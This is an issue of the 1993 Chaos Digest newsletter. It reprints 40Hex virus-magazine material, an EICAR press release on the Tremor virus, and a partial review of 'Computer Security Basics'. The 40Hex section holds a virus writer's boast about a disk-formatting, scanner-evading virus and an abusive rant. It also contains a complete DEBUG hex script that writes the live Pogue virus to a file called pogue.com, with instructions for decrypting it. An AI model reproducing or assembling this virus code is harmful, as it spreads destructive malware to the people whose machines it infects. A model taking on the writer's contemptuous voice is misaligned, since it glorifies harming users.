Chaos Digest Vendredi 25 Juin 1993 Volume 1 : Numero 63 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.63 (25 Juin 1993) File 1--40H VMag Number 7 Volume 2 Issue 3 #008(2)-009 (reprint) File 2--Consequences du virus TREMOR (communique) File 3--"Computer Security Basics" de Deborath Russell (critique) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 7 Volume 2 Issue 3 #008(1)-009 (reprint) <<<<<<<<<< Article 2: <<<<<<<<<< ========================================================================== Date: 04-27-92 (04:18) Number: 264 of 275 (Echo) To: ALL Refer#: NONE From: STEVENS WALLACE Read: (N/A) Subj: 666 IS GONNA GET YEAH Status: PUBLIC MESSAGE Conf: N_VIRUS (41) Read Type: GENERAL (A) (+) Rock Steady `666' Virus Released: Mar 24'92 [Montreal,Canada] PROGRAMMED:By Rock Steady. A few patches from other neat Viruses DAMAGE:The Virus will format the HD BOOT & FAT area on the 13th of every Month! I wrote TWO formating procedures. One with the INT 13h and one with the INT 26h! To make 100% the suckers HD gets trashes for GOOD! NOTES:This is a Simple EXE & COM Infector! It infects ALL Files Executed The Virus Hides in High Memory! And Hooks Int 21h! It will increase files by the length of 666 Bytes! but if the Virus is Resident in Memory the Length of the Files on a "DIR" will remain the SAME under MSDOS V3.30 - 5.0! OTHER:*uck the Name. Its the ONLY text in the Virus! So the Anti-Virus people will call it `Rock Steady', since the virus needs that signature to check if the file is infected on infection routines & DIR routine! PURPOSE:To make a very small "Stealth" Virus. And create a HOLE shit load of damage for people not to forget! ANTI-VIRAL:*uck Them! I've tried with SCANV89B, F-PROT2.03A, VirexPC Central Point 1.2, Nortan Scanner, ViruScan And it's UNDETECTABLE! Neat heh? McGill Univ. is flipping over this new Virus that they just got hit with in Montreal. *uck it's hot... aLl comments to moi... ======================================================================= <<<<<<<<<< Article 3: <<<<<<<<<< Extracted from "Gui Guts" by Yacco, in ComputerCraft Magazine, June 1992 ------------------------------------------------------------------------ Mutant Ninja Morons ------------------- Did you survive the Michaelangelo Virus? That's what everybody, including Bill, the guy from UPS, has been asking me. I spent most of last night organizing and archiving several year's worth of data. I suppose I should be grateful to the fan of comic culture who wrote this virus for the motivation to do something I've been putting off for a long time. But these virus writers aren't exactly virtuous. I wouldn't be sitting here now creating files with tomorrow's date on them if they were. In fact, it occurs to me that what motivates them is a need to control and terrorize people. In other words, they're a new breed of rapist: the mass rapist. And just like physical rape isn't about sex, electronic rape isn't about intellectual challenges. [I wasn't going to comment until I got this classic article. This is so funny. This guy thinks Michelangelo was named after the Teenage Mutant Ninja Turtle. And hell, *IF* we are rapists, Yacco, better bend over and spread em wide, cause we are gonna fuck you hard. What kinda name is Yacco??? Fuck him. Why is everyone so curious as to what motivates us? Can't it be that we just simply enjoy it? Must it be social problems, or publicity? Don't blame the virus community for the Michelangelo scare, blame the Anti Virus Community. It was a scare, a simple ploy to gain money! I had everyone asking me how do I protect myself? So, I spent a couple days helping out people who weren't infected. Everywhere I went, Michelangelo! How many infections did I find? 1. One fucking infection. I think everyone in the Anti-Virus Community benefitted. Do you think that the author of Michelangelo made a press release about the virus? I don't recall that. So, there goes the publicity theory. He didn't control anyone. Anti-Virus people did. A scare tactic. Plain and simple. The End.] PS: Saw a useful article in the latest issue of a magazine? Anything Virus related? Well, ya don't have to type it in! Just contact a -=PHALCON/SKISM=- Member, and we will take care of it. Leave him mail stating what magazine, what issue, and what page, and your handle (We will throw ya into our Greet list). ->GHeap! +++++ 40Hex Number 7 Volume 2 Issue 3 File 009 Pogue Mahone! The following is what Patti Hoffman has to say about the Pogue virus. ----------------------------- VSUMX 9204 ------------------------------------ Virus Name: Pogue Aliases: Scan ID: [Pogue] & [7S] & [DAME] & [512] (memory) V Status: New Discovered: January, 1992 Symptoms: .COM file growth; decrease in total system & available free memory; music Origin: Bulgaria Eff Length: 2,973 - 3,850 Bytes Type Code: PRhC - Parasitic Resident .COM Infector Detection Method: ViruScan V86B+, Novi 1.1+ Removal Instructions: Delete infected files General Comments: The Pogue virus was submitted in January, 1992. It is originally from bulgaria. Pogue is a memory resident infector of .COM programs, but not those that have a base file name which starts with the three characters "COM". Pogue contains portions of code from four other viruses: 512, Dark Avenger, Seventh Son, and Yankee Doodle. It employs a complex encryption mechanism, and detection of infected files will require an algorithmic approach. It does occassionally infect a file with an inencrypted copy of itself, and as a result may appear to the user as an infection of one of the four viruses on which it is based. The first time a program infected with the Pogue virus is executed, the Pogue virus will install itself memory resident at the top of system memory but below the 640k DOS boundary. Total system and available free memory, as indicated by the DOS CHKDSK program, will have decreased by 9,728 bytes. Interrupt 12's return will not have been moved. Interrupts 1C and 21 will be hooked by the virus. Once the Pogue virus is memory resident, it will infect .COM programs when they are opened, executed, or copied. In the case of copying, both the source and the target file will infected. The exception is that Pogue will not infect a .COM file if the base file name starts with the three characters "COM". This is the mechanism used by the virus to avoid infecting COMMAND.COM. Pogue infected programs will have a file length increase of 2,973 to 3,850 bytes. The virus will be located at the end of the infected program. The file's date and time in the DOS disk directory listing will not have been altered by the viral infection process. Usually the Pogue virus will encrypt itself using its garbling encryption mechanism on infected files. In these files, no text strings will be visible within the viral code. Occassionally, this virus will infect a file with an unencrypted copy of the viral code. In these cases, the following text strings will be visible: "Pogue Mahone!" - or - "Pgoue Mahone!" "TNX2DAV" The unencrypted infections of Pogue on files as well the Pogue virus in system memory may be detected by anti-viral scanners as any of the four viruses on which Pogue is based. The Pogue virus will play music on the system speaker when it becomes memory resident and the system time is between 08:00 and 09:00. ----------------------------- VSUMX 9204 ------------------------------------- To decrypt, simply fire up debug and type g 13D ------------------------------------------------------------------------------ n pogue.com e 0100 4D E9 04 00 00 00 00 00 BD 6C A1 B1 03 D3 CD 8B e 0110 CD BD 6E 85 81 CD 0F 74 8B F5 BD 92 3B 03 EE 33 e 0120 E9 81 ED 0C B1 8B 9E 23 0D 81 C3 64 9D 87 9E 23 e 0130 0D BB 31 8F 2B DD BD 33 8F 2B EB 75 E8 8B DD B1 e 0140 03 D3 CB 84 63 9C C0 5B 63 9D B9 1F 51 9F B8 F3 e 0150 E3 62 28 A8 8D 93 5F 41 08 FB C0 54 3D 76 30 BD e 0160 E2 98 08 10 CB 54 63 CC 2F BD 9E 9F D4 FB 80 A2 e 0170 EE 74 AB 2A 3B 1C A1 9C 62 F6 D7 EB 03 9F 62 C9 e 0180 C2 9E D4 E3 05 9F 62 1D 91 AE 62 FC 64 2A 69 AE e 0190 62 AA 81 55 2C A7 F2 8F 07 2A 3C 5A E7 9C ED 9A e 01A0 08 41 21 0C 63 27 61 41 08 A2 81 56 37 9D 1A BD e 01B0 87 69 84 56 70 9E 1A B8 87 62 69 AC 6E 9C F2 69 e 01C0 84 CA 29 A2 2C A8 62 9C 4A A6 62 A3 81 5F B7 EA e 01D0 BA CE A6 DD B8 62 69 AD 6E 9C F2 63 69 AE 6E B2 e 01E0 6E 63 69 B0 6E 08 6F 50 8D 69 84 1C 61 A1 D7 B4 e 01F0 E2 96 64 11 76 63 69 AE 6E 32 6F 63 69 B0 6E 52 e 0200 6F 62 69 AC 6E 9D F2 5F 17 C8 2F BD 60 69 E3 99 e 0210 6A 12 51 5F 13 9F 31 38 A0 76 3D 10 91 EE B3 EF e 0220 B2 F2 B9 BA 68 1C 5F DA D7 A0 16 E1 4D A3 9F 9C e 0230 AD 11 6D 50 A0 69 84 0E 67 2F 4B 0C 63 A3 81 FB e 0240 C0 F4 BD F5 BC 39 91 9B 91 20 63 54 76 41 00 6B e 0250 FF BA B5 EC 70 BB E2 DA 72 A8 63 11 AA 1C A1 AD e 0260 6E 9C D6 A2 60 AA 73 A8 4D D6 ED BA 74 A8 46 FD e 0270 86 98 49 FD E5 DB 61 11 6A 62 69 AC 6E 9E 4D C0 e 0280 12 52 49 DF ED A3 48 DE E8 60 49 DE 46 FD 6E 9F e 0290 48 FD E5 A2 74 A8 64 27 81 B0 6E 26 6A 3E 74 A8 e 02A0 61 A2 76 A8 BA F7 81 39 91 9B 91 0C 63 98 1B 9C e 02B0 95 69 84 EE FB DC B2 69 84 23 36 54 87 D1 2F BD e 02C0 B5 A2 E9 76 71 BB 1C 6D 64 50 88 EC 2F BD 1A BC e 02D0 74 EF 2F CB 88 26 80 54 79 AE 2F CB BD A2 81 9B e 02E0 D8 9E 61 11 67 1D E0 C4 A5 EB D7 17 E3 19 8D E9 e 02F0 D7 11 E4 19 83 DF B1 10 D1 1C E0 AE 52 0F CB 62 e 0300 A8 9E 64 CF 22 BC A7 A0 E9 E1 77 EC 70 BB 1B A0 e 0310 62 5A 28 A8 ED 72 17 DB 2F BD E2 D8 AF 10 A2 1C e 0320 9F F6 D6 D6 88 27 A8 AD 88 25 A8 B1 B2 F2 B9 F1 e 0330 80 A2 B5 84 AF 9C BD 50 A3 69 84 D7 2A A3 81 F9 e 0340 C1 FA BA 11 7C 63 67 E9 4B C9 66 9C EB E0 64 CF e 0350 22 C2 EB E1 77 55 67 9C ED 72 17 DC 2F BD 68 BB e 0360 F1 E1 77 1C B0 A2 A2 50 A1 38 71 84 3B 9A E3 E9 e 0370 67 DC F1 E1 66 2B A8 9E BA BB BC 69 84 F4 BC 69 e 0380 84 5F 5D 28 36 25 81 98 63 27 3F 25 81 9A 63 56 e 0390 63 9D 65 5E F8 28 2B 2A 33 A1 52 9C F0 5C 1F 9C e 03A0 71 97 1C 65 6E 2C 96 9B 96 92 16 AB 1A 9D 6B 84 e 03B0 D9 9C 5C CA 03 98 63 2A 33 CA 03 9A 63 27 43 97 e 03C0 26 EC D1 03 D8 01 83 E9 C3 04 D2 0A C8 BD 62 80 e 03D0 A3 26 43 80 A3 DC 4D BD B3 EF 90 26 81 66 6F CE e 03E0 61 CA ED 23 2F A8 4A CB 62 55 68 9C 33 7C ED 74 e 03F0 95 78 DC 9D A2 7E 58 F7 BB EF 90 26 81 67 6F CE e 0400 61 CA EB 23 2F A8 E2 5F 65 CA EA BA 2D A8 E8 60 e 0410 91 D6 80 66 6F F7 D7 A2 90 1C 69 66 6F 9E 25 E9 e 0420 D6 E1 82 CC 90 D5 92 7D 5F BA B4 F1 4A C2 62 27 e 0430 3D 31 BD FA BF C7 41 EF B9 ED 4A 5A 63 F5 C0 5B e 0440 BC A1 8D 95 BA EE 55 40 BC F6 C0 C7 2C C7 5C 3D e 0450 99 9D 59 74 26 A2 81 1F 24 B2 59 75 E3 7D 61 11 e 0460 65 E5 AB 33 06 CE 63 9F 23 C0 60 11 65 E4 AA EC e 0470 F9 5B 97 9D 0D 2D 0E 31 0E 32 0E 4D 83 6E 44 1C e 0480 54 BC EA E9 55 F9 B7 EF 4A E0 61 5B 9F 9D 1B A4 e 0490 62 4C 62 8F 0D 5B BC 9D 15 A3 4A B5 62 EB E3 9B e 04A0 BC 9D D6 AA B4 F3 B7 54 64 9C 4A 4C 63 FB F7 47 e 04B0 C2 F6 BD F4 95 89 B3 EF B4 F3 95 5C 22 FF 62 27 e 04C0 32 8F 0E 4C 67 22 A8 A8 B2 27 B8 A9 21 F5 65 F1 e 04D0 4A 65 65 F9 4A E6 64 F4 C1 F6 04 D1 63 C0 63 C4 e 04E0 68 CB 63 EC 4A 5C 65 F4 62 E0 45 2F BE C9 B2 9D e 04F0 D4 2F D8 A1 9B E0 50 11 EF F7 25 9F 2C 27 3A 33 e 0500 04 CE 63 21 23 11 66 5B BC A1 1D F5 63 ED B2 D7 e 0510 3C 10 72 E7 EC A3 96 9D 9E FD D6 9E 96 A5 0C DD e 0520 4D 89 BD F4 1D EC 63 21 35 10 6E 2D 13 85 0D 27 e 0530 42 2E 0E 5B BC A1 58 A2 97 9D 6A 11 6C 93 3C 1F e 0540 44 AB 12 2C 56 46 F0 21 0A 96 64 A3 86 9A 64 A2 e 0550 98 9D 4A 96 61 2A 40 6D 4B 27 2B 8F 08 F3 B2 CF e 0560 2B 2A 3C 28 2C 57 E2 A1 21 A8 62 96 EA E9 64 23 e 0570 80 97 B4 EF B9 BA 68 BB 70 57 BC 9F 4A DA 62 31 e 0580 6A FB 5C F4 0D F4 0D 97 BE BA 69 5B C6 9C 95 92 e 0590 1C BD 62 CF 22 8F 12 10 8A 27 A8 9A 9E 62 D5 8F e 05A0 1D 9D 62 32 EE E1 A2 D7 25 10 6A A7 22 11 47 48 e 05B0 FB 2E 4B BF 60 24 67 E2 AC 11 5A 87 39 A2 B5 67 e 05C0 BD 5F B8 27 4F F3 B3 EF B2 27 C1 9E EC A3 D7 AA e 05D0 F5 5B 4A 9C 1B BD 62 8E 12 9B A8 58 ED 61 FB DC e 05E0 63 E2 64 F4 BD F5 C1 F9 31 5B 8C 9D 1A 9D 63 46 e 05F0 0E 50 E4 3F 63 9C 4A 7B 60 2E 4B 77 60 26 C0 9B e 0600 95 9B EE 8F EE E8 61 1C 60 A2 D7 A1 E2 66 64 87 e 0610 7A 1C 60 22 D8 9F 94 65 A6 BE A7 9E 9C 5F D6 BC e 0620 32 87 D6 A0 6C 65 D7 9E 6C 6E 13 9C D7 A2 6D 89 e 0630 D8 76 13 9E 6C 89 DC A0 EB D1 12 9D EA A0 4D CA e 0640 F4 70 6F 1C 48 1C D7 9E 32 84 A3 DC A2 26 43 24 e 0650 67 26 B8 9A A5 26 55 9A 29 24 D8 9A ED 76 1A 9C e 0660 EC 6B D6 A0 9E A2 D4 9E E8 69 96 5D EC A3 33 82 e 0670 EC F0 83 9A A8 9B ED E1 60 D6 A7 9B D5 DF 4B 11 e 0680 62 E9 6C 92 DC 0D ED D0 A7 10 59 E9 D7 D0 B5 57 e 0690 E6 A2 E8 62 91 73 9F 22 E9 62 F6 4D 91 3C 98 9D e 06A0 D7 A6 0A 9E D7 9E 13 DA 0A A0 4D A4 0A A0 D7 9E e 06B0 13 D2 0A 9E D6 9F EC 5D 0D F4 4A D9 62 25 DF 80 e 06C0 0E 5F EE 71 F0 09 64 95 26 23 63 22 E7 21 1D AF e 06D0 6C 92 DB 4E 9D 8C D7 85 E3 18 46 9B D8 B5 B2 A6 e 06E0 58 10 69 A6 22 11 72 26 29 A7 4F 11 67 D6 66 10 e 06F0 68 F7 6E 2C 0D 5F BB A8 7A 2F 0D 2F 14 9F 34 7C e 0700 6D 62 0D 5F EE 74 33 84 EE 64 34 7D 22 BF 62 8E e 0710 11 11 17 29 D8 7A 34 8A E3 D8 65 0E 55 29 A8 7A e 0720 26 3C 8F 9D FA 6C 43 84 3D 9B D5 0B 05 C5 63 84 e 0730 35 9B D6 9E 94 5C B3 6C 4B 24 AA BD 32 87 02 26 e 0740 6A C0 E1 D8 65 11 69 3A D5 E4 A2 87 A6 D8 66 11 e 0750 70 3A D6 A3 ED 8F 14 A4 35 DC 83 E4 4D CE 9E A2 e 0760 D4 CC D7 C6 32 7F ED FB 84 6C 46 27 DA BD 95 5C e 0770 1D 9D 62 27 2B 27 5D 25 E2 BD B0 10 78 E2 59 92 e 0780 B5 93 4A C7 2A 23 32 27 29 CF 34 FA 4D 85 97 AB e 0790 EA A3 BA A6 22 11 FB 6C 91 C5 63 5F EB BA 90 9D e 07A0 B4 F3 4A E0 60 FB BC F3 21 E0 63 54 62 9B 0E 9A e 07B0 23 47 0E 9A 2B 47 EB E1 65 26 C0 79 B6 EE 4A 36 e 07C0 64 27 5A 84 5C 9D BC F7 C1 EF A7 10 67 E9 D7 FE e 07D0 A7 E9 A4 10 6B E6 AF 26 67 84 BB A0 A7 F7 B9 84 e 07E0 68 9E 6D 89 D8 E0 BB E9 1A EC 63 23 A7 80 6D 92 e 07F0 DB BC A7 ED B2 26 A7 9F 86 53 9F 23 D8 E7 9D 08 e 0800 51 11 A9 1C D8 98 65 6C C7 9F DB E6 15 93 13 9F e 0810 4D DD E3 95 BF 9D D7 A9 E5 85 66 1F 52 9F EC B8 e 0820 94 9B 61 E4 52 57 B3 9D 4D 09 6D 92 DC B0 EC D0 e 0830 4D AC B7 84 14 9D EC E0 63 A8 F2 46 BB A6 58 15 e 0840 64 2E BB 53 62 62 68 67 26 84 EF 97 87 9E 66 23 e 0850 F6 26 29 84 93 9A ED A0 E3 9B BC 9F D5 BF B2 E9 e 0860 94 6E ED 8C 33 08 45 84 99 9B B5 F3 4A 4E 61 84 e 0870 16 9C C1 F6 B3 84 92 9B BC F4 4A 53 66 A6 4F 14 e 0880 67 A8 A2 46 0D 4C D8 46 BE F4 ED 64 8E 63 AB 46 e 0890 6D 5C DB 9F 95 77 26 84 0E 9B B4 56 BC A1 E3 9B e 08A0 BC 9F D5 0D B6 4F 6A 27 38 84 53 9A BA 5B BB 9D e 08B0 95 77 EE 73 ED E8 4A 6C 4C 38 D6 A6 9C 14 53 11 e 08C0 68 29 AA EC 5F 46 A6 39 D8 89 AA D7 5C 0F 87 D6 e 08D0 DE 7F D8 A3 ED 96 29 A1 C2 87 7B F3 4A 95 5D C0 e 08E0 69 34 F6 9F 41 D7 3C 13 56 26 68 22 6A 46 9E 96 e 08F0 D8 86 C2 F9 ED 69 8E 6B E6 18 49 9C D6 A2 E3 5D e 0900 BF 9D 8D 6B EE F0 4E 27 25 9F 33 9F A6 8A BE 1F e 0910 DF 8A 63 11 65 27 25 84 68 9C F4 F6 ED F8 46 C7 e 0920 A6 86 EC A3 25 CF 2B 3C 8C 9D FA 2F 1D 9A 62 26 e 0930 6A D8 65 10 69 D8 66 11 84 93 3D 6C 46 EF A5 84 e 0940 67 9C BD 56 65 9C EC FB 83 D6 A1 11 70 27 56 9F e 0950 B2 BD 6C 6E D7 A0 EB EC 83 E5 25 CE 61 1C 8A 1B e 0960 ED B3 ED 5F 33 7F EE FB 83 1C 5D 9F D4 EC B2 EF e 0970 4A 84 62 F7 EC 7B B5 84 44 9B F6 F5 BD 26 9A 1C e 0980 51 A9 D6 A1 E2 62 6A 11 6B 24 D8 9F EA 11 55 87 e 0990 87 1C 61 A1 D5 BB 6C 6E D8 B2 9C F1 45 10 79 C8 e 09A0 70 C0 71 D8 67 0F 6C D8 64 0F 6D 1C 61 9F D4 A1 e 09B0 EA 19 54 4E E3 A6 33 1C 45 1C 6D B3 EA B3 25 84 e 09C0 71 9C 4A AF 5C C0 69 10 75 CE 22 D6 A6 9F D6 A7 e 09D0 4A A1 5C C0 65 11 65 4C 6A D0 66 34 EE 74 E9 14 e 09E0 5B A6 61 10 4E 46 26 63 A7 9E 61 1C 95 9B ED A3 e 09F0 87 1B 63 6C 46 56 63 9B AB 10 4E 26 97 E4 D6 82 e 0A00 EE F3 83 14 44 EC B4 EF EC 7A 4B 76 62 F7 BB F4 e 0A10 9E A8 D7 DC 6C 6E D8 6A 9D D0 D6 66 B3 ED B5 EE e 0A20 4A AA 64 F6 ED E0 63 D6 52 11 67 A6 46 10 68 4F e 0A30 E8 84 26 98 BE 4C D8 46 A8 10 76 1D 62 F5 65 0E e 0A40 67 1C A8 9B BA 27 2A 23 AA FF EB 23 4A 9C AF E3 e 0A50 ED 73 4E 05 B3 ED 6C 6E D8 FF 9C 10 64 11 C1 26 e 0A60 A7 9F 6C 5C DB BD 86 A3 D6 A4 9C A0 D6 B5 9E 9F e 0A70 D4 B1 E2 11 61 9E 58 E0 65 DC D6 D7 B2 A8 3A 26 e 0A80 43 4C 5A 47 BB 87 93 84 B1 95 1C A4 62 EC EC 62 e 0A90 6F EC 0C F4 15 1C 46 BF B1 E5 A2 C0 69 34 EE 74 e 0AA0 ED FC 5A A6 46 10 49 E7 D7 A6 BD EF 94 9B ED C3 e 0AB0 6C 80 DB 75 4B 19 64 2F 61 DC 5A 26 56 F7 B4 84 e 0AC0 88 9B 4B 08 64 F6 BA 62 A7 9F E2 D8 6E 11 6F 27 e 0AD0 3D 27 3A C7 35 24 BA 9B 4C BE 63 26 4F EC 6C 6E e 0AE0 D8 C0 E2 9A E3 11 73 C8 67 D8 66 4C 64 0E 64 DC e 0AF0 EC 8C 6F F4 0C 87 72 A6 58 14 6E D6 96 10 6A 26 e 0B00 41 CE 61 9A AB 94 BB 4F 6E C8 6B 10 78 4F 86 E4 e 0B10 D6 AC 66 A2 FA 15 C8 4F 96 DC D6 A2 15 9F DC 9E e 0B20 15 C7 EC E0 63 A6 34 11 7B 1C 49 23 E3 97 8E 11 e 0B30 66 1C 31 DC EA 10 66 84 AB 97 D6 0D 6D 5C D7 9D e 0B40 A7 1C 56 A2 B4 DE A4 1F 5D A1 BC 0F A4 A7 22 14 e 0B50 75 1C 5E D1 D7 D4 A4 11 97 26 53 4C 65 4F 5A 26 e 0B60 4E 87 37 A7 34 15 68 93 3D 1C 56 C4 6E DC E2 97 e 0B70 68 10 65 A8 6A 46 AD 10 97 46 4E CD 13 A0 D7 CB e 0B80 6C 6E D7 A2 1A 56 65 46 F5 47 F4 87 33 E6 6C 5C e 0B90 D7 B0 E2 7F 9B A8 22 A6 3A 26 25 34 96 5E 13 1D e 0BA0 D8 9F 12 1F 5C 46 F6 46 F5 47 D6 9D B1 87 AE DD e 0BB0 9E A3 D6 68 A3 D8 66 38 D6 9E 8E 9E 6C 6E D8 DF e 0BC0 B2 4C 64 4F ED 26 4E 1C 61 9F D6 9D A5 84 67 97 e 0BD0 BB 39 B3 0E 6F 54 E3 BB E6 00 46 10 67 46 13 7D e 0BE0 0E F4 15 6F 15 9D EC 10 64 84 6E 97 F5 1C 5E 5D e 0BF0 D7 A3 32 84 D5 A0 F5 46 F5 46 EB 08 65 26 D7 9D e 0C00 94 6E 26 4F 24 39 D6 A7 EC 87 59 5E 6B 10 67 92 e 0C10 3D D0 63 1C 45 AB D6 81 E3 96 64 10 68 D6 C6 7F e 0C20 D7 60 16 6D E3 96 66 0E 20 EC 12 4D ED 7E 0E 87 e 0C30 13 26 A7 9D FA EC E3 9B BC 9F D5 A1 ED 74 EB 14 e 0C40 53 A6 34 11 6A 4F EE 84 E9 96 D6 A1 6E 54 0D 2E e 0C50 0E F4 25 9C 62 B2 6E 08 6F E4 7E CE 7B CC 77 7C e 0C60 75 CC 77 34 6D D5 6D 35 6F C0 70 C0 70 34 6D D5 e 0C70 6D 34 6D CC 77 CC 77 CC 77 7B 72 6C 73 7C 75 6C e 0C80 73 7C 75 6C 73 7C 75 CC 77 7C 75 CC 77 34 6D D5 e 0C90 6D 35 6F C0 70 C0 70 34 6D D5 6D 34 6D CC 77 CC e 0CA0 77 CC 77 7B 72 6C 73 7C 75 CC 77 CC 77 9B 62 A0 e 0CB0 66 A8 66 A4 66 A0 6E A0 6A A0 66 A4 66 A0 6A A0 e 0CC0 66 A8 66 A4 66 A0 6E A0 6A A0 66 A8 66 A4 66 A0 e 0CD0 6A A0 66 A4 66 A0 6E A0 6A E4 7E CC 77 0E 79 7C e 0CE0 75 CC 77 E4 7E 3D 84 CE 7B 5A 82 7C 75 CC 77 0E e 0CF0 79 CE 7B E4 7E E4 7E 9B 62 A4 6E A0 66 A0 66 A0 e 0D00 72 A4 66 A0 72 A4 6A B4 2F BC 62 9C 82 86 4C BC e 0D10 A4 CA 75 80 03 2A 74 60 4A E9 73 40 83 08 75 A9 e 0D20 25 C8 E4 rcx 0C23 w q ------------------------------ Date: Fri Jun 25 06:01:28 GMT 1993 From: percomp@infohh.rmi.de (perComp-Verlag GmbH ) Subject: File 2--Consequences du virus TREMOR (communique) EICAR--European Institute for Computer Anti-Virus Research PRESS RELEASE Consequences of the Tremor-Virus -------------------------------- The authors of virus are concentrating more and more on the development of techniques with hide their virus against anti-virus programs and which cause a growing amount of work for analysing the virus-code. The Bulgarian Mutating Engine (MtE) --which can be used to ease the development of polymorphic viruses-- is only one example. It is remarkable that only a few new viruses were found up to now which are using the MtE. Therefore the detection and the results of the Tremor-Virus are a really bad news. The first tremor-infected program in Germany was found in January 1993 already. The following features of the virus were known after a first look at the virus-code: lengh of the virus is 4,000 byte, the year of the date- stamp n the directory is increased by 100 and .COM and .EXE files will become infected, later on we learned, that these features are nos always present. Due to this fact ll scanners which try to find Tremor did not detect all samples of this virus. The very expensive analysis of Tremor which was dne by Christoph Fischer, MicroNIT Virus Center of the Karlsruhe University, was nearly completed end of May. He was sending out the results immediately to all members of CARO. Established anti-virus manufacturers can also ask for a copy. Since the first show up of Tremor nearly four month have passed before the result of the virus analysis was available. The sophisticated virus-code as well as the severe pressure of work to all virus specialists were the reason for this long time. Therefore the following requirements should be fuldilled in the future: the analysis of viruses must be automized as much as possible. A better cooperation between the virus specialists working in virus test centers as well as for anti-virus manufacturers must be established. The Tremor was probably developed in Germany. At least one or more German software distributors delivered diskettes with tremor-infected programs. The acccident of "Channel Videodat" --a PKUNZIP.EXE infected with Tremor was transmitted by cable- and satellit-TV-- was only one of the issues (details in: Chronologie des Channel-Videodat-Unfalls). This experience leads to requirements which must be fulfilled by software-manufacturers and -distri- butors. It is not enough to use some actual virus scanners to decide whether a product is free of viruses. For example checksumming-programs can be used during the test to detect viruses. The German BSI (Bundesamt fuer Sicherheit in der Informationstechnik) will write down such requirements which should be fulfilles by manufactureres and distributors. In case of questions, please contact: eicar e.V. c/o perComp-Verlag GmbH, Holzmuehlenstr. 84, D-22041 Hamburg, telephone: +49 40 693 20 33, fax: +49 40 695 99 91, e-mail: percomp@infohh.rmi.de ------------------------------ Date: Wed Jun 16 13:25:00 -0600 1993 From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep ) Subject: File 3--"Computer Security Basics" de Deborath Russell (critique) Copyright: Robert M. Slade, 1993 O'Reilly and Associates, Inc. 103 Morris St., Suite A Sebastopol, CA 95472-9902 800-338-6887 fax: 707-829-0104 info@ora.com Computer Security Basics, Deborah Russell and G. T. Gangemi Sr., 1991, ISBN 0- 937175-71-4 "Computer Security Basics" is a pretty accurate name. The book is an overview of many aspects that go into the security of computers and data systems. While not exhaustive, it at least provides a starting point from which to pursue specific topics which require more detailed study. A thorough reading of the book will ensure that those charged with security will not miss certain aspects of the field in a single minded pursuit of one particular threat. Having said that, it is difficult to recommend the book as a "sole source" for information. While it contains a great deal of useful, helpful and informative material, the quality and accuracy is inconsistent. One would do well to check items with other sources. The book starts with an introduction of what security is, and how to evaluate potential loopholes. The definition points out the useful difference between the problems of confidentiality and availability. (Also defined is the difference between a "hacker" and a "cracker".) The distinction between threats, vulnerabilities and countermeasures is helpful, but may fail to resolve certain issues. (For example, the discussion does not finally aid in determining whether a manager, too "lazy" to provide good security practices, is just a vulnerability or an actual threat.) Chapter two gives some historical background to the development of modern data security. Chapter three looks at access control, four at viral programs and other "malware", five at systems and planning, and six at the "Orange Book". Chapters seven and eight cover communication, first with encryption and then more generally. Chapter nine deals with physical and site security, as well as biometrics (for access control), while ten deals with the specific physical security of TEMPEST. The book takes itself very seriously, sometimes even pompously. There does not appear to be any room for frivolity. Therefore, it is difficult to know whether the comment on page 92 that a novel in process may fall into the category of "important to you, but ... of little interest to anyone else" is unintentionally funny, or just insulting. There are "Hints" pages scattered throughout the book, which are generally very useful and practical. Not universally: page 87 suggests that you "vaccinate" programs before running them, seemingly a reference to functions such as, among others, SCAN's "add verification" which have led to problems in the past. Page 97 stresses the importance of never eating or drinking near the terminal: I, in common with most "habitual" users, *contstantly* have food or drink near the terminal. In the past fifteen years only once has soda made it into my keyboard, and someone else did that. I have two reasons for dealing with chapter four, "Viruses and Other Wildlife", in detail. Firstly, this review was originally intended as part of a series of reviews of books related to the computer virus situation. Secondly, the problems of this chapter serve as an illustration of other parts of the book that deal with specialty areas. The problems actually start on page seven, where an item entitled "Virus Flambe" repeats the popular, but wholly unfounded, myth that some viral programs can cause physical damage. This report again repeats the "flaming monitor" urban legend. (The Jerusalem description, just prior, is not notable for its accuracy either.) Once into chapter four, we are told that the difference between a worm and a virus is that a worm is not destructive, whereas a virus always is. The book contradicts itself: we are told both that a worm hides in host programs and that it does not. I was intrigued to learn that Ken Thompson's demonstration of a compiler "trapdoor generator" is a virus, even though it does not "pass along" its ability to generate insecurities beyond the programs it compiles. A trojan is apparently a "mechanism for disguising a virus or worm", always performs the "advertised" function as opposed to something referred to as a "trojan mule" 